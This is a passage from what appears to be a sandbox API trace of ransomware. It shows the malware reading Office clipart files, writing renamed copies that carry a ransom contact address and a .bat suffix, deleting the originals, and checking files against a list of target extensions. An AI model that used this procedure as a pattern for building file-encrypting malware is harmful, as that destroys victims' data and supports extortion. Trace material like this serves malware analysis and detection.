[0197.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.105] GetLastError () returned 0x0 [0197.105] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1d08, lpOverlapped=0x0) returned 1 [0197.316] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1d10, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1d10, lpOverlapped=0x0) returned 1 [0197.317] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.317] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.317] SetEndOfFile (hFile=0x3a4) returned 1 [0197.317] CloseHandle (hObject=0x3a4) returned 1 [0197.317] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.317] SetEndOfFile (hFile=0x358) returned 1 [0197.318] CloseHandle (hObject=0x358) returned 1 [0197.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf")) returned 1 [0197.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.319] lstrlenW (lpString=".doc") returned 4 [0197.319] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.319] lstrlenW (lpString=".docx") returned 5 [0197.319] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0197.319] lstrlenW (lpString=".pdf") returned 4 [0197.319] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.319] lstrlenW (lpString=".xls") returned 4 [0197.319] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.319] lstrlenW (lpString=".xlsx") returned 5 [0197.319] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0197.319] lstrlenW (lpString=".ppt") returned 4 [0197.319] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.319] lstrlenW (lpString=".zip") returned 4 [0197.319] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.319] lstrlenW (lpString=".rar") returned 4 [0197.319] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.319] lstrlenW (lpString=".bz2") returned 4 [0197.319] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.319] lstrlenW (lpString=".7z") returned 3 [0197.319] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.319] lstrlenW (lpString=".dbf") returned 4 [0197.319] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString=".1cd") returned 4 [0197.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString=".jpg") returned 4 [0197.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString=".doc") returned 4 [0197.320] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString=".docx") returned 5 [0197.320] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0197.320] lstrlenW (lpString=".pdf") returned 4 [0197.320] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString=".xls") returned 4 [0197.320] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.320] lstrlenW (lpString=".xlsx") returned 5 [0197.320] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0197.320] lstrlenW (lpString=".ppt") returned 4 [0197.320] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString=".zip") returned 4 [0197.320] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.320] lstrlenW (lpString=".rar") returned 4 [0197.320] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString=".bz2") returned 4 [0197.320] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString=".7z") returned 3 [0197.320] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString=".dbf") returned 4 [0197.320] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString=".1cd") returned 4 [0197.320] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF") returned 68 [0197.320] lstrlenW (lpString=".jpg") returned 4 [0197.320] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.321] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.321] lstrlenW (lpString="J0172193.WMF") returned 12 [0197.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.321] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=12696) returned 1 [0197.321] CloseHandle (hObject=0x358) returned 1 [0197.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf")) returned 0x220 [0197.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.322] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.322] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.322] GetLastError () returned 0x0 [0197.322] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x3198, lpOverlapped=0x0) returned 1 [0197.324] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x31a0, lpOverlapped=0x0) returned 1 [0197.326] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.326] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.326] SetEndOfFile (hFile=0x3a4) returned 1 [0197.326] CloseHandle (hObject=0x3a4) returned 1 [0197.326] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.326] SetEndOfFile (hFile=0x358) returned 1 [0197.327] CloseHandle (hObject=0x358) returned 1 [0197.327] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.327] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf")) returned 1 [0197.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.328] lstrlenW (lpString=".doc") returned 4 [0197.328] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.328] lstrlenW (lpString=".docx") returned 5 [0197.328] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0197.328] lstrlenW (lpString=".pdf") returned 4 [0197.328] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.328] lstrlenW (lpString=".xls") returned 4 [0197.328] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.328] lstrlenW (lpString=".xlsx") returned 5 [0197.328] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0197.328] lstrlenW (lpString=".ppt") returned 4 [0197.328] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.328] lstrlenW (lpString=".zip") returned 4 [0197.328] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.328] lstrlenW (lpString=".rar") returned 4 [0197.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.328] lstrlenW (lpString=".bz2") returned 4 [0197.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.328] lstrlenW (lpString=".7z") returned 3 [0197.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.328] lstrlenW (lpString=".dbf") returned 4 [0197.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.329] lstrlenW (lpString=".1cd") returned 4 [0197.329] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.329] lstrlenW (lpString=".jpg") returned 4 [0197.329] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.329] lstrlenW (lpString=".doc") returned 4 [0197.329] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString=".docx") returned 5 [0197.329] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0197.329] lstrlenW (lpString=".pdf") returned 4 [0197.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString=".xls") returned 4 [0197.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.329] lstrlenW (lpString=".xlsx") returned 5 [0197.329] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0197.329] lstrlenW (lpString=".ppt") returned 4 [0197.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.329] lstrlenW (lpString=".zip") returned 4 [0197.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.329] lstrlenW (lpString=".rar") returned 4 [0197.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString=".bz2") returned 4 [0197.329] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.329] lstrlenW (lpString=".7z") returned 3 [0197.329] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.330] lstrlenW (lpString=".dbf") returned 4 [0197.330] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.330] lstrlenW (lpString=".1cd") returned 4 [0197.330] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF") returned 68 [0197.330] lstrlenW (lpString=".jpg") returned 4 [0197.330] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.330] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.330] lstrlenW (lpString="J0174315.WMF") returned 12 [0197.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.330] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=5864) returned 1 [0197.331] CloseHandle (hObject=0x358) returned 1 [0197.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf")) returned 0x220 [0197.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.331] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.331] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.333] GetLastError () returned 0x0 [0197.333] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x16e8, lpOverlapped=0x0) returned 1 [0197.335] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x16f0, lpOverlapped=0x0) returned 1 [0197.335] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.336] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.336] SetEndOfFile (hFile=0x3a4) returned 1 [0197.336] CloseHandle (hObject=0x3a4) returned 1 [0197.336] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.336] SetEndOfFile (hFile=0x358) returned 1 [0197.337] CloseHandle (hObject=0x358) returned 1 [0197.337] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.337] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf")) returned 1 [0197.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.337] lstrlenW (lpString=".doc") returned 4 [0197.337] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.337] lstrlenW (lpString=".docx") returned 5 [0197.337] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0197.337] lstrlenW (lpString=".pdf") returned 4 [0197.337] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.337] lstrlenW (lpString=".xls") returned 4 [0197.338] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.338] lstrlenW (lpString=".xlsx") returned 5 [0197.338] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0197.338] lstrlenW (lpString=".ppt") returned 4 [0197.338] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.338] lstrlenW (lpString=".zip") returned 4 [0197.338] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.338] lstrlenW (lpString=".rar") returned 4 [0197.338] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString=".bz2") returned 4 [0197.338] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString=".7z") returned 3 [0197.338] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.338] lstrlenW (lpString=".dbf") returned 4 [0197.338] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.338] lstrlenW (lpString=".1cd") returned 4 [0197.338] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.338] lstrlenW (lpString=".jpg") returned 4 [0197.338] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.338] lstrlenW (lpString=".doc") returned 4 [0197.338] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString=".docx") returned 5 [0197.338] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0197.338] lstrlenW (lpString=".pdf") returned 4 [0197.338] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.338] lstrlenW (lpString=".xls") returned 4 [0197.338] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.338] lstrlenW (lpString=".xlsx") returned 5 [0197.338] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0197.338] lstrlenW (lpString=".ppt") returned 4 [0197.339] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.339] lstrlenW (lpString=".zip") returned 4 [0197.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.339] lstrlenW (lpString=".rar") returned 4 [0197.339] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.339] lstrlenW (lpString=".bz2") returned 4 [0197.339] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.339] lstrlenW (lpString=".7z") returned 3 [0197.339] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.339] lstrlenW (lpString=".dbf") returned 4 [0197.339] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.339] lstrlenW (lpString=".1cd") returned 4 [0197.339] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF") returned 68 [0197.339] lstrlenW (lpString=".jpg") returned 4 [0197.339] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.339] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.339] lstrlenW (lpString="J0174635.WMF") returned 12 [0197.339] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.340] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=9736) returned 1 [0197.340] CloseHandle (hObject=0x358) returned 1 [0197.340] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf")) returned 0x220 [0197.340] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.340] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.341] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 